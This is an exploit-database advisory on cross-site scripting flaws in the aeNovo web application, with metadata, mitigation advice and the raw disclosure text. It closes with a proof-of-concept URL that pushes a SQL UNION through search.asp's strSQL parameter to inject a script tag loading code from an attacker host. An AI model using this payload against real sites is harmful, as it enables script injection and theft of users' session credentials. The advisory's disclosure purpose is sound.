header-logo
Suggest Exploit
vendor:
aeNovo
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: aeNovo
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

aeNovo Multiple Cross-Site Scripting Vulnerabilities

The aeNovo application fails to properly sanitize user-supplied input, leading to multiple cross-site scripting vulnerabilities. An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of a user visiting the affected site. This can result in the theft of authentication credentials and other malicious activities.

Mitigation:

It is recommended to implement proper input validation and sanitization routines to prevent cross-site scripting vulnerabilities. Regular security updates and patches should be applied to the aeNovo application to address these issues.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15038/info

aeNovo is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. 


http://www.example.com/target/search.asp?strSQL=SELECT+%2A+FROM+pages+where+1=2+union
+all+select+'01','02','%3CScRiPT%20src=http://h4cK3r/devil_Script/%3E'
,null,null,null,null,null,null+from+control